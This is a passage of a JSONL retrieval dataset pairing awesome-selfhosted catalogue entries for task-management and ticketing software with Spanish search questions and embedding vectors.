0.04591, -0.00121, 0.01136, 0.06618, -0.09175, -0.08616, -0.01436, 0.02814, -0.03234, -0.04037, -0.00315, 0.04503, 0.00118, 0.04206, -0.01594, 0.01836, -0.04557, -0.01015, 0.04006, 0.11916, 0.04877, -0.02383, -0.1329, 0.10056, -0.07493, 0.13121, -0.00175, -0.06661, 0.01497, 0.00322, -0.04115, -0.049, 0.00578, 0.00351, -0.12954, 0.00627, -0.00646, -0.03211, 0.08028, -0.06787, -0.05581, 0.01673, 0.02591, 0.01634, 0.09806, -0.09752, 0.04448, 0.14358, 0.06736, 0.02446, -0.0366, -0.01304, -0.05266, -0.0502, -0.04512, 0.00772, -0.00251, -0.00782, -0.05549, -0.11539, -0.07662, 0.07075, 0.05177, 0.00574, 0.0153, 0.0349, 0.01963, -0.11745, 0.024, 0.09802, 0.02271, -0.04685, 0.00053, 0.03961, -0.03102, -0.03387, -0.01487, -0.02091, -0.0472, 0.01925, -0.03286, -0.0102, 0.00034, 0.01665, 0.02171, -0.03682, 0.03457, 0.0431, 0.00466, 0.06812, 0.02796, 0.01843, 0.10259, -0.03441, 0.01268, -0.074, 0.02568, -0.01597, 0.07504, 0.01511, -0.04184, 0.03015, 0.10275, 0.0241, 0.01845, -0.03146, -0.09424, 0.04091, -0.05312, 0.0203, -0.03395, 0.00064, 0.00449, -0.01963, 0.06856, -0.00506, -0.04206, -0.02596, 0.01671, 0.01586, -0.04735, -0.01674, 0.07308, 0.02768, -0.02187, 0.09277, 0.0133, -0.00451, 0.11576, 0.11621, 0.02011, -0.00126, -0.01275, 0.02723, -0.00794, -0.016, 0.01345, 0.01841, 0.0384, 0.03391, -0.03422, 0.02124, 0.07345, 0.01022, -0.02316, -0.04594, -0.01688, 0.05203, 0.00636, 0.00782, -0.01982, -0.00716, 0.03916, 0.05029, 0.03873, -0.0664, 0.00028, -0.04766, -0.01201, -0.05604, -0.03093, 0.0629, 0.01969, -0.01549, -0.09387, 0.02822, -0.07404, 0.01071, -0.04013, 0.01742, -0.03463, 0.01562, 0.00209, -0.03205, 0.06411, -0.00996]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "cual es una alternativa libre a TickTick o Todoist que funcione sin internet?", "v": [-0.17647, 0.05543, -0.14154, 0.14211, 0.16866, -0.1404, -0.10372, -0.05517, -0.05463, 0.07152, 0.0558, -0.1555, 0.09709, 0.17045, 0.16523, -0.07109, 0.06333, -0.21046, 0.21521, -0.12405, -0.03845, 0.0075, -0.03023, -0.05897, 0.07304, -0.10134, -0.03323, -0.01229, -0.14534, 0.04883, 0.04189, -0.02766, 0.09298, -0.03095, -0.00206, -0.08856, 0.13975, 0.11225, 0.13065, 0.00978, 0.03406, -0.02011, -0.09729, 0.05059, -0.05593, 0.0534, -0.01107, -0.05047, 0.10721, 0.07031, -0.07668, -0.02225, -0.03634, 0.02233, -0.03792, 0.02384, 0.14024, -0.07672, 0.09926, 0.00766, -0.08003, 0.01209, 0.05305, 0.00221, 0.10355, -0.0216, -0.01601, -0.0099, -0.01446, 0.09639, 0.05107, 0.03013, -0.06166, -0.06925, 0.02308, 0.0736, -0.03875, -0.00126, 0.00552, -0.00625, 0.03901, -0.01586, 0.01074, 0.03033, -0.1029, -0.02708, 0.05866, -0.16062, -0.02745, 0.02878, 0.03436, 0.03327, -0.04236, 0.10425, -0.00435, -0.08429, 0.05522, 0.00683, -0.0054, -0.02715, 0.07811, 0.07466, -0.13603, 0.02808, -0.03927, -0.0085, 0.01949, 0.00609, -0.09084, -0.03062, 0.018, -0.01708, -0.00454, -0.01872, 0.02301, -0.02291, -0.06208, -0.0048, -0.00456, -0.00532, -0.04129, 0.00067, 0.00652, -0.04058, 0.07474, 0.05985, 0.03968, 0.05186, -0.06905, 0.00926, 0.06508, -0.06024, -0.05357, -0.12981, -0.10177, -0.05951, 0.04546, -0.0276, 0.03784, -0.03901, 0.02473, -0.03974, -0.03467, 0.01994, 0.04188, -0.02238, 0.0327, -0.01699, -0.08966, 0.00698, -0.07506, 0.05008, -0.02168, 0.03276, -0.0024, 0.00563, -0.05053, -0.04802, -0.01848, 0.02849, 0.02039, -0.04213, 0.03245, 0.01799, -0.07407, 0.05689, -0.05409, 0.07063, -0.09347, -0.00353, -0.01118, 0.04273, 0.01899, -0.08395, 0.02095, -0.0517, -0.03865, -0.0431, 0.04848, -0.00314, -0.00645, 0.03097, -0.09297, -0.00673, -0.05602, -0.01218, -0.01807, -0.03922, -0.0323, 0.02045, -0.00705, -0.02095, -0.05952, -0.04066, -0.00092, 0.00425, -0.02669, -0.09808, 0.02512, -0.01936, -0.06027, -0.05219, -0.04178, -0.04064, -0.01555, 0.01701, 0.0434, -0.01437, -0.01148, 0.0643, 0.01936, -0.06561, 0.03767, -0.03666, -0.02943, 0.02796, 0.06059, -0.06997, -0.05995, -0.03799, 0.01936, -0.04936, 0.00656, 0.08068, 0.01997, 0.06102, 0.04898, 0.02233, 0.01217, -0.00365, 0.00754, -0.00538, -0.00024, -0.01746, -0.0451, -0.02014, -0.01028, 0.0146, -0.0695, 0.001, 0.02472, 0.04783, -0.00633, -0.00507, 0.01077, -0.03769, -0.09452, 0.01187, -0.01133, -0.06491, -0.05112, 0.09892, -0.00614, -0.00987, 0.04865, 0.03226]} +{"tipo": "pregunta", "herramienta": "Task Management & To-do Lists", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Task Management & To-do Lists", "tema": "task management & to-do lists", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Task Management & To-do Lists: tududi β€” Task management tool with hierarchical structure, smart recurring tasks, and seamless Telegram integration [MIT, Docker]. Vikunja β€” The to-do app to organize your life [AGPL-3.0/GPL-3.0, Go]. Wekan β€” Open-source Trello-like kanban [MIT, Nodejs]. Will Be Done β€” Offline-first task manager with weekly planning, project boards, real-time sync, Vim keybindings, desktop quick add, and import from popular task managers (alternative to TickTick, Todoist) [AGPL-3.0, Docker/Nodejs].", "indexar": "con que puedo montar un sistema de planificador semanal offline?", "v": [0.08784, 0.16408, -0.22809, -0.12117, -0.1468, -0.08296, -0.01759, -0.04249, -0.12409, -0.16569, -0.09583, -0.06589, 0.10628, -0.06554, 0.0446, 0.04947, 0.0381, -0.11089, 0.01751, 0.03235, -0.09412, -0.02558, -0.01834, -0.05492, 0.05961, 0.01129, -0.00523, -0.04917, -0.2118, -0.04006, 0.0128, 0.08018, 0.05778, -0.05921, 0.01891, -0.00756, 0.01944, 0.09205, -0.02964, -0.12737, -0.05215, 0.00778, -0.07542, 0.05433, 0.07331, 0.04318, -0.02745, -0.10798, -0.04218, -0.00958, -0.08819, -0.02706, -0.04592, 0.08589, 0.03636, -0.06686, 0.15636, -0.12772, 0.0733, -0.04149, 0.02591, 0.02334, -0.02451, -0.01187, 0.16567, 0.0397, -0.04276, 0.04686, -0.12369, 0.04571, -0.01655, -0.07968, 0.07088, -0.01214, 0.04711, 0.02708, 0.12241, 0.07392, 0.05399, -0.01487, -0.03971, -0.025, -0.02226, 0.16433, -0.05829, -0.06894, -0.01181, -0.04042, 0.00375, 0.04205, -0.05021, -0.05628, -0.02647, -0.02156, 0.00123, -0.08164, 0.05993, 0.03344, -0.03484, 0.02206, -0.0699, 0.01222, -0.07831, 0.08117, -0.0553, 0.011, 0.02118, 0.08463, 0.05483, -0.00817, -0.00011, 0.00827, -0.06827, -0.0012, -0.04802, -0.07042, -0.00514, 0.10445, 0.03449, 0.00026, -0.00022, 0.16812, 0.05423, -0.01979, 0.11168, 0.00459, 0.04024, 0.1004, -0.00573, 0.0217, 0.01304, 0.00118, -0.01034, -0.01687, -0.08413, 0.01169, -0.03388, 0.03262, -0.00259, 0.03881, -0.03643, 0.014, -0.01254, -0.07534, 0.11968, -0.04063, 0.04926, -0.12912, -0.00267, -0.03703, -0.01063, 0.16301, 0.0134, -0.04373, -0.02376, -0.00662, 0.05685, -0.09686, 0.05568, 0.06444, -0.00192, 0.02011, 0.0256, 0.03534, 0.002, -0.07766, -0.01886, -0.07558, -0.00949, 0.04441, 0.02772, 0.07908, 0.08521, -0.11063, 0.01912, -0.01983, -0.03441, -0.06618, 0.00112, 0.00454, -0.05911, 0.01562, 2e-05, 0.03464, -0.08127, -0.02311, -0.02779, 0.03853, 0.00514, 0.03974, 0.04242, 0.00238, -0.03938, 0.04208, 0.03496, -0.04046, -0.0153, 0.04722, 0.02948, 0.00153, -0.03379, -0.06786, 0.07341, -0.04774, 0.01815, 0.01721, 0.05022, 0.02217, 0.03762, 0.10522, 0.04148, -0.06293, 0.0347, -0.10815, -0.03039, 0.02276, -0.01634, -0.03069, -0.0123, -0.02457, 0.05765, -0.01032, 0.02607, 0.02317, 0.00588, 0.02931, -0.01249, 0.02918, 0.00256, -0.05496, -0.00578, -0.06322, 0.03883, -0.01876, -0.01921, -0.03965, 0.07511, 0.07011, -0.07561, -0.0056, 0.06594, 0.07437, 0.08989, -0.0098, -0.03861, -0.0577, -0.05978, -0.03328, -0.0094, -0.0538, -0.01725, 0.0572, 0.04316, -0.01, -0.0136, -0.00011]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "que programa sirve para reportar errores de mi aplicaciΓ³n web", "v": [0.00306, 0.13478, -0.0985, -0.30029, 0.0731, -0.09354, -0.01697, -0.03263, -0.02468, -0.0189, -0.07643, -0.16669, -0.01552, -0.10484, 0.03717, -0.02015, 0.03497, -0.0613, 0.1187, 0.0058, -0.00959, 0.07285, -0.02566, -0.06324, -0.11481, 0.12515, -0.0128, -0.07194, -0.05268, -0.06486, -0.05874, -0.01821, 0.09233, -0.07793, -0.10794, 0.04488, 0.00748, -0.05562, -0.04452, 0.04359, 0.14745, 0.00517, -0.0586, 0.01082, 0.06094, 0.00893, 0.07779, -0.02968, -0.04057, 0.0655, 0.04718, -0.04808, 0.00558, 0.07021, -0.04232, -0.00994, 0.04915, -0.18005, -0.02553, -0.03478, -0.03556, -0.0445, -0.0128, -0.03276, 0.02996, -0.04888, 0.06385, 0.05756, -0.11815, 0.06624, 0.02021, 0.06583, 0.09356, -0.00792, -0.03695, -0.02509, -0.05218, -0.03162, 0.03587, -0.0446, -0.00523, -0.02671, -0.0511, 0.11674, -0.06418, 0.01882, 0.07757, -0.02472, 0.06823, -0.07836, 0.01611, 0.0737, -0.01675, 0.03027, 0.02787, -0.14876, 0.20226, -0.02293, 0.06805, 0.09211, 0.0953, -0.14882, -0.03497, -0.00851, -0.09623, 0.07116, 0.10875, -0.01502, -0.10358, -0.00651, -0.02563, -0.06859, -0.04289, -0.00513, -0.05357, 0.03053, 0.01861, -0.02227, 0.00835, -0.06591, -0.0679, -0.04049, -0.05758, -0.01789, 0.0406, 0.04078, -0.00225, 0.15249, -0.0478, 0.10959, 0.0092, -0.02311, -0.06183, 0.05916, 0.02942, -0.00983, 0.06749, 0.00438, 0.02939, 0.03071, 0.00131, 0.00653, -0.03955, 0.06304, 0.00169, 0.01609, 0.02331, -0.00193, -0.05148, -0.01644, -0.02322, -0.01718, -0.0745, 0.00063, -0.11298, -0.06288, -0.02699, -0.05968, -0.00253, -0.02109, -0.08187, -0.02065, 0.00103, -0.01761, 0.07613, -0.05333, 0.01547, 0.0708, 0.12781, 0.07724, -0.04375, 0.10164, 0.05384, -0.16812, 0.01377, 0.00246, -0.03763, 0.00945, 0.0276, -0.03715, -0.07473, -0.01502, 0.06041, 0.10426, 0.02989, -0.00686, -0.01215, 0.0167, -0.0284, -0.01882, -0.04469, -0.01804, -0.0108, -0.04403, 0.04086, 0.05138, 0.0092, -0.01101, 0.06495, -0.05802, -0.05279, -0.00576, -0.04191, 0.01711, 0.0489, 0.10275, 0.03742, -0.02028, 0.05143, 0.10186, -0.0096, -0.03451, 0.03085, -0.00084, -0.00938, -0.06557, 0.07569, 0.0999, -0.01798, -0.00204, -0.02636, -0.09648, -0.02457, 0.03215, -0.01832, -0.02921, 0.05311, -0.07209, -0.01842, -0.00344, 5e-05, -0.06058, -0.05438, -0.09405, 0.00019, -0.057, 0.01333, -0.00444, -0.02888, -0.09134, -0.03137, 0.04883, 0.04037, -0.0383, 0.02392, -0.01253, -0.00273, 0.00728, -0.01468, 0.01395, -0.06989, 0.01922, 0.03233, -0.03856, 0.02064, 0.01711]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a Zendesk o Help Scout", "v": [-0.09443, -0.00639, -0.23016, -0.14114, -0.10824, -0.03857, -0.24232, -0.09605, -0.03681, 0.01911, -0.14346, -0.12584, -0.18546, -0.05624, 0.04823, -0.07698, 0.12361, -0.02282, 0.11902, 0.01985, 0.02831, 0.0253, 0.01814, 0.01458, -0.02095, -0.03353, 0.07751, 0.04115, -0.0844, 0.09718, -0.01758, -0.0972, -0.06277, 0.04765, -0.03212, -0.01768, 0.23495, 0.08821, 0.16566, 0.05908, -0.07886, 0.0379, -0.07642, 0.1103, 0.07697, 0.1047, -0.10963, 0.01258, -0.03294, 0.05351, -0.01138, -0.00108, -0.00625, -0.03616, 0.03925, -0.02873, 0.05436, -0.05523, -0.02882, -0.09346, -0.11319, -0.02362, 0.0429, -0.0775, 0.05769, 0.07221, -0.11062, -0.05444, -0.03081, 0.09863, 0.06657, 0.04216, 0.12028, -0.12312, -0.07795, -0.00235, -0.08495, -0.04253, 0.02388, 0.01242, 0.06557, -0.02378, -0.03822, 0.01734, -0.02004, -0.06653, 0.02873, 0.00971, -0.01428, -0.03194, -0.03945, 0.10273, -0.02073, 0.14123, -0.05673, -0.09393, -0.02531, 0.07836, 0.02565, 0.00027, -0.01966, -0.07756, -0.09568, 0.00275, -0.01396, -0.05486, 0.01413, 0.06037, -0.1347, 0.08205, 0.07012, 0.05787, -0.01378, 0.08922, 0.01532, -0.00789, 0.02854, -0.01449, 0.09907, -0.06081, -0.0185, -0.00955, -0.05636, -0.02321, 0.03668, 0.05583, 0.00477, 0.01577, 0.00562, 0.02688, 0.03919, -0.06439, -0.02677, -0.06595, -0.1114, -0.02587, 0.06759, -0.01594, 0.05829, 0.02326, -0.01161, -0.03155, 0.06507, -0.00375, 0.02018, -0.01569, -0.01779, -0.00297, 0.06103, -0.06456, -0.03832, 0.07329, 0.03417, 0.11322, -0.03095, -0.04696, -0.04039, 0.06858, -0.04357, 0.02132, 0.00274, -0.00117, 0.04499, -0.01641, -0.05132, 0.01265, 0.0535, -0.02366, -0.11139, 0.01512, 0.00789, 0.02899, 0.04313, -0.06204, 0.06302, -0.05766, -0.05054, -0.09913, 0.03456, 0.01413, 0.01946, 0.06364, -0.01398, 0.04035, 0.03078, -0.01763, -0.03052, -0.00689, 0.0443, 0.04208, -0.02538, -0.00283, -0.03882, -0.11317, -0.03545, -0.0425, -0.01544, -0.06177, 0.00564, -0.02821, -0.05086, 0.03436, -0.02955, -0.05187, 0.02739, 0.0278, 0.01581, 0.03379, 0.04954, 0.05748, 0.06778, -0.00097, 0.08713, 0.02082, -0.01484, -0.03655, 0.01568, 0.03264, 0.01651, -0.0516, 0.01532, 0.00065, 0.00666, -0.02587, -0.02225, 0.03416, 0.04245, 0.02312, -0.08079, 0.03856, 0.03104, -0.01692, 0.00947, 0.05273, -0.00457, -0.02261, -0.0082, 0.05104, 0.02765, -0.00462, 0.01374, 0.06094, 0.01934, 0.05605, -0.05206, -0.01223, -0.03635, 0.00971, -0.04533, -0.04555, -0.08146, 0.0178, 0.01097, 0.01558, 0.04682, -0.00304]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: BugPin β€” Visual bug reporting and ticketing tool for web applications [AGPL-3.0/MIT, Docker]. Bugzilla β€” General-purpose bugtracker and testing tool originally developed and used by the Mozilla project [MPL-2.0, Perl]. Frappe Helpdesk β€” Helpdesk software which helps you streamline your company's support, offers an easy setup, clean user interface, and automation tools to resolve customer queries efficiently [AGPL-3.0, Docker]. FreeScout β€” Email-based customer support application, help desk and shared mailbox (alternative to Zendesk and Help Scout) [AGPL-3.0, PHP/Docker]. GlitchTip β€” Error tracking app to collect errors reported by your app [MIT, Python/Docker/K8S]. ITFlow β€” Client IT documentation, ticketing, invoicing and accounting for MSPs (Managed Service Providers) [GPL-3.0, PHP]. Libredesk β€” Modern omnichannel customer support desk. Live chat, email, and more in a single binary [AGPL-3.0, Docker/Go/Nodejs]. MantisBT β€” Bug tracker, fits best for software development [GPL-2.0, PHP].", "indexar": "con que puedo montar un sistema de tickets y soporte al cliente", "v": [0.01965, 0.07531, -0.2166, -0.18187, -0.1368, -0.04021, -0.01515, 0.00333, -0.14012, -0.08102, -0.14238, -0.06535, 0.10172, 0.00854, 0.04813, -0.01479, 0.01362, -0.12668, 0.10548, 0.0261, 0.0357, -0.06563, -0.05271, -0.08221, -0.00495, 0.11437, 0.12855, -0.07803, -0.13548, 0.02784, 0.04031, -0.06423, -0.05336, 0.01476, 0.03453, -0.12812, -0.02596, 0.03503, 0.03121, -0.06433, 0.01109, -0.14464, 0.08917, 0.02912, 0.04678, -0.07809, 0.00918, -0.01657, -0.01309, -0.01885, -0.00816, -0.13439, -0.1561, -0.02238, -0.01795, -0.13456, 0.10677, -0.07257, 0.05753, -0.0133, 0.00681, 0.08626, -0.0421, 0.09214, 0.03098, 0.0596, 0.03244, -0.04507, -0.06461, -0.06244, -0.09555, -0.02859, 0.0901, 0.04808, -0.00598, 0.08328, 0.11767, 0.02365, 0.03472, 0.02471, 0.02021, 0.08933, -0.08308, 0.083, 0.03889, -0.02006, -0.01267, -0.04489, -0.01151, 0.02637, 0.07505, 0.01277, 0.06786, 0.02623, 0.01471, -0.137, -0.02227, -0.01966, -0.07812, -0.02133, -0.11339, -0.03325, -0.01139, 0.05588, -0.02213, -0.07448, 0.14189, -0.10658, 0.01404, -0.00333, -0.04714, 0.07084, -0.14809, -0.01709, -0.04906, -0.10811, 0.06378, 0.0666, 0.01678, 0.06064, 0.0729, 0.09329, 0.05987, -0.06367, 0.07977, 0.00216, 0.05044, 0.1295, 0.01845, -0.07694, 0.00495, 0.03227, -0.03816, 0.02294, 0.04651, 0.00515, -0.02601, 0.05392, -0.01967, 0.05099, 0.04446, 0.00407, -0.00409, -0.07741, 0.11605, -0.02138, 0.04663, -0.0741, -0.02473, -0.04463, 0.01185, 0.09424, -0.01214, 0.0047, -0.04248, -0.02612, 0.07134, -0.06662, 0.04363, 0.05259, 0.02185, 0.0395, 0.0321, 0.05821, -0.01336, -0.01704, -0.12933, -0.06218, 0.10533, 0.0649, -0.02122, 0.03597, 0.10739, -0.01705, 0.04696, -0.02476, -0.04128, -0.06416, 0.06271, -0.01397, -0.02583, -0.01295, 0.03654, 0.03373, -0.03304, -0.01026, -0.00296, -0.00726, 0.04096, 0.02027, 0.04633, 0.04271, -0.06504, 0.02599, -0.02234, -0.05141, -0.07419, 0.02523, -0.02208, 0.01556, -0.05544, 0.02191, 0.04124, -0.07148, 0.01406, 0.01208, 0.01734, 0.07238, 0.08657, 0.04198, 0.06361, -0.03167, 0.04919, -0.04597, -0.07, 0.00534, -0.02282, 0.01221, -0.02093, -0.01118, 0.03201, 0.00547, 0.05673, 0.05825, -0.01677, -0.03351, 0.01852, 0.01247, 0.02534, 0.00033, 0.00697, -0.06502, 0.02875, -0.00487, 0.03795, -0.01569, 0.06492, -0.04333, -0.07581, 0.00319, 0.06601, 0.09163, 0.01945, -0.02059, -0.02757, -0.02726, -0.09922, 0.00349, 0.00889, -0.06747, -0.03738, 0.02036, -0.01576, -0.04251, 0.016, -0.05564]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "que programa hay para gestionar tickets de servicio al cliente en la web?", "v": [-0.02853, 0.03014, -0.07883, -0.2509, -0.02946, -0.13455, -0.01482, 0.01278, -0.04171, -0.05343, -0.08034, -0.15627, 0.03641, -0.04482, 0.00952, -0.00623, 0.08469, -0.13585, 0.19173, 0.07897, -0.02315, 0.15222, 0.01473, -0.00544, -0.15078, 0.01038, 0.14294, -0.12079, -0.07847, 0.09058, 0.03023, -0.17797, -0.06556, -0.09924, 0.11227, -0.00438, -0.0026, 0.10049, 0.04782, -0.04, 0.00734, -0.08662, -0.00211, 0.06134, 0.07584, -0.05901, 0.08361, -0.07662, 0.00905, -0.01929, -0.07888, -0.10267, -0.12275, -0.01298, 0.07347, -0.03848, -0.07378, -0.17751, -0.04388, -0.0185, 0.00221, 0.00153, -0.02948, 0.08024, 0.04215, 0.02323, 0.13324, 0.01283, 0.00393, 0.00619, -0.09781, -0.01466, 0.06286, 0.04508, 0.05151, -0.01688, 0.08574, 0.04485, 0.03285, -0.02131, 0.05216, 0.05429, -0.06936, 0.02944, -0.0515, 0.0142, 0.00642, -0.02838, -0.03476, 0.06002, 0.07721, 0.09294, -0.0068, -0.00292, -0.01475, -0.08328, 0.09251, -0.07244, 0.00298, 0.00416, -0.0226, 0.00458, -0.06612, 0.07802, -0.07356, 0.09089, 0.10991, -0.06425, -0.10457, 0.07401, -0.08699, -0.03254, -0.05235, -0.0472, -0.0538, 0.01825, 0.08666, -0.00148, 0.07642, -0.0028, -0.07663, 0.02224, 0.04143, -0.03355, 0.06927, 0.04559, -0.01983, 0.11302, 0.00994, -0.04986, -0.03253, 0.01231, -0.06262, 0.01519, -0.00356, -0.04877, 0.00885, -0.0157, 0.0296, -0.0206, -0.06469, 0.03642, -0.01534, 0.05637, 0.14242, -0.07626, 0.00148, -0.04608, -0.04274, 0.056, 0.00543, -0.01908, -0.04878, 0.07498, -0.05175, -0.0094, -0.02066, -0.07637, -0.08312, 0.04132, -0.05498, -0.01642, 0.0578, 0.05622, 0.05354, -0.02615, -0.07857, 0.0652, 0.07314, 0.0519, -0.03799, 0.05538, 0.04983, -0.05151, 0.04718, 0.02027, -0.0644, -0.09836, 0.08003, 0.00998, -0.0118, -0.06774, 0.06788, 0.063, -0.05998, -0.01102, -0.08034, 0.03171, -0.03011, -0.00595, 0.00976, -0.01276, -0.05404, 0.03409, 0.03447, -0.03381, -0.07143, 0.00686, -0.04355, -0.03231, -0.09052, -0.02759, 0.05499, 0.01229, -0.01831, 0.07468, 0.04128, 0.04754, 0.06273, 0.05793, 0.00994, -0.03778, 0.05397, -0.04217, -0.04582, -0.03408, 0.03389, -0.00462, 0.03988, 0.03584, -0.00288, -0.05206, -0.00558, 0.03644, -0.0326, -0.07357, 0.04221, 0.02879, 0.06602, 0.0274, -0.00227, -0.05497, 0.02313, -0.00487, 0.02657, -0.03431, 0.07474, -0.08234, -0.06113, -0.04386, 0.00264, 0.08998, 0.00977, 0.01334, -0.01028, 0.01986, -0.08921, 0.00287, -0.0006, 0.02049, -0.02146, -0.01294, -0.01582, 0.01185, 0.06068, -0.00194]} +{"tipo": "pregunta", "herramienta": "Ticketing", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Ticketing", "tema": "ticketing", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Ticketing: OTOBO β€” Flexible web-based ticketing system used for customer service, help desk, IT service management [GPL-3.0, Perl/Docker]. Request Tracker β€” Enterprise-grade issue tracking system [GPL-2.0, Perl]. Roundup Issue Tracker β€” Simple-to-use and -install issue tracking system with command-line, web, REST, XML-RPC, and e-mail interfaces. Designed with flexibility in mind - not just another bug tracker [MIT/ZPL-2.0, Python/Docker]. Zammad β€” Easy to use but powerful open-source support and ticketing system [AGPL-3.0, Ruby/deb].", "indexar": "con que puedo montar un sistema de seguimiento de incidencias sencillo pero flexible?", "v": [0.06799, 0.23873, -0.31, -0.1433, -0.09969, -0.07748, -0.11023, 0.01537, -0.12741, -0.09914, -0.03514, 0.01916, 0.04023, -0.04907, 0.11052, 0.03043, -0.06961, -0.17951, -0.08417, -0.04196, -0.10726, -0.09898, -0.04862, -0.07242, -0.01083, 0.0906, -0.08438, -0.06335, -0.16567, -0.09275, 0.00839, 0.0782, 0.07451, 0.03135, -0.0868, -0.07047, -0.05749, 0.01604, 0.05689, -0.13621, 0.04212, -0.09359, 0.01622, -0.01456, 0.1019, -0.01015, -0.00262, 0.02411, 0.0038, -0.00461, -0.00124, -0.01755, -0.06317, -0.06422, -0.04256, -0.09691, 0.08982, -0.12385, -0.01154, -0.05099, 0.06563, 0.07261, 0.02406, 0.03536, 0.08422, 0.0075, 0.05165, -0.03863, -0.01466, -0.00452, -0.03022, -0.10368, -0.00387, 0.01535, -0.00216, 0.09534, 0.05713, -0.05275, -0.01712, 0.03225, 0.00866, 0.02886, 0.01572, 0.02305, 0.04256, 0.01623, 0.05958, -0.09455, -0.02534, 0.01718, 0.0737, -0.00755, 0.03617, 0.0341, -0.01988, -0.0292, 0.02861, 0.12149, -0.10691, -0.00064, -0.01569, 0.03213, 0.03006, 0.06696, 0.01946, -0.06839, 0.05743, 0.00687, 0.03302, -0.05398, -0.00248, 0.04837, -0.06559, -0.0247, -0.07071, 0.00481, -0.04524, 0.07827, -0.07266, 0.02688, 0.00637, 0.05477, 0.00067, -0.03995, 0.10484, -0.03084, 0.03431, 0.0502, -0.05099, 0.03451, 0.03103, -0.06032, -0.05621, -0.00345, 0.09428, 0.07178, -0.02168, 0.02804, -0.011, 0.04883, 0.00085, 0.05188, 0.01244, -0.06734, 0.0916, -0.03489, 0.07317, -0.0844, -0.01099, 0.06412, 0.00321, 0.0937, -0.0171, -0.03205, -0.0083, -0.02367, 0.09056, -0.01067, 0.00884, -0.01446, -0.00259, 0.07701, 0.01531, 0.06784, 0.03246, -0.00427, 0.0135, -0.03248, 0.08031, 0.02105, -0.08367, 0.10201, 0.07784, -0.06138, 0.06132, -0.04245, -0.09641, -0.0745, 0.01149, 0.03256, -0.08235, 0.05276, 0.03313, 0.02273, 0.04814, -0.0121, -0.05192, 0.10028, 0.02375, 0.04935, 0.1056, 0.05279, 0.02487, 0.02964, 0.02441, 0.00724, -0.02155, -0.02247, -0.05686, 0.01209, -0.08543, 0.03742, 0.07779, -0.09167, -0.00663, 0.04372, 0.0079, 0.09047, 0.07405, 0.09383, 